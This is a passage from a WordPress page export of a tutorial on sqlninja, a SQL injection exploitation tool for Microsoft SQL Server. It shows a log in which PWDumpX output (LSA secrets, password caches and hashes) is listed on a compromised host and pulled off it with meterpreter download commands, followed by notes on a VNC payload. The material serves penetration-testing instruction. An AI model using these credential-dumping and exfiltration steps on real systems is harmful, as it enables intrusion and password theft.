of C:\\\n\n05\/29\/2009  06:51a               6,438 127.0.0.1-LSASecrets.txt\n05\/29\/2009  06:51a                 451 127.0.0.1-PWCache.txt\n05\/29\/2009  06:51a                 867 127.0.0.1-PWHashes.txt\n05\/29\/2009  06:51a                 867 127.0.0.1-PWHistoryHashes.txt\n02\/09\/2009  05:16p      <DIR>          Documents and Settings\n05\/29\/2009  06:49a              37,384 DumpExt.dll\n05\/29\/2009  06:49a              24,400 DumpSvc.exe\n05\/27\/2009  08:37a      <DIR>          Program Files\n05\/29\/2009  06:49a              32,813 PWDumpX.exe\n11\/16\/2005  08:25a      <DIR>          Temp\n05\/27\/2009  08:37a      <DIR>          WINNT\n              xx File(s)      x,xxx,xxx bytes\n               x Dir(s)   x,xxx,xxx,xxx bytes free\n\nC:\\>exit\nexit\nmeterpreter > download c:\\\\127.0.0.1-LSASecrets.txt 127.0.0.1-LSASecrets.txt\n[*] downloading: c:\\127.0.0.1-LSASecrets.txt -> 127.0.0.1-LSASecrets.txt\n[*] downloaded : c:\\127.0.0.1-LSASecrets.txt -> 127.0.0.1-LSASecrets.txt\nmeterpreter > download c:\\\\127.0.0.1-PWCache.txt 127.0.0.1-PWCache.txt\n[*] downloading: c:\\127.0.0.1-PWCache.txt -> 127.0.0.1-PWCache.txt\n[*] downloaded : c:\\127.0.0.1-PWCache.txt -> 127.0.0.1-PWCache.txt\nmeterpreter > download c:\\\\127.0.0.1-PWHistoryHashes.txt 127.0.0.1-PWHistoryHashes.txt\n[*] downloading: c:\\127.0.0.1-PWHistoryHashes.txt -> 127.0.0.1-PWHistoryHashes.txt\n[*] downloaded : c:\\127.0.0.1-PWHistoryHashes.txt -> 127.0.0.1-PWHistoryHashes.txt\nmeterpreter > \n<\/code><\/pre><\/p>\n
The VNC payload option looks awesome.  You can view the demo ((http:\/\/sqlninja.sourceforge.net\/sqlninjademo.html<\/a>)) from the sqlninja website to see it in action.  It worked for me but also didn\u2019t work for me.  The VNC payload was uploaded and launched successfully but once the VNC window opened all I saw was a black screen and a mouse pointer.  My guess is the connection was too slow to register the mouse movements and screen refresh.  Your mileage will I\u2019m vary (and hopefully be more successful).<\/p>\n","protected":false},"excerpt":{"rendered":"
SQLNINJA For a PDF version of this tutorial click here. From the site: Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-140","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=140"}],"version-history":[{"count":40,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/140\/revisions"}],"predecessor-version":[{"id":259,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/140\/revisions\/259"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}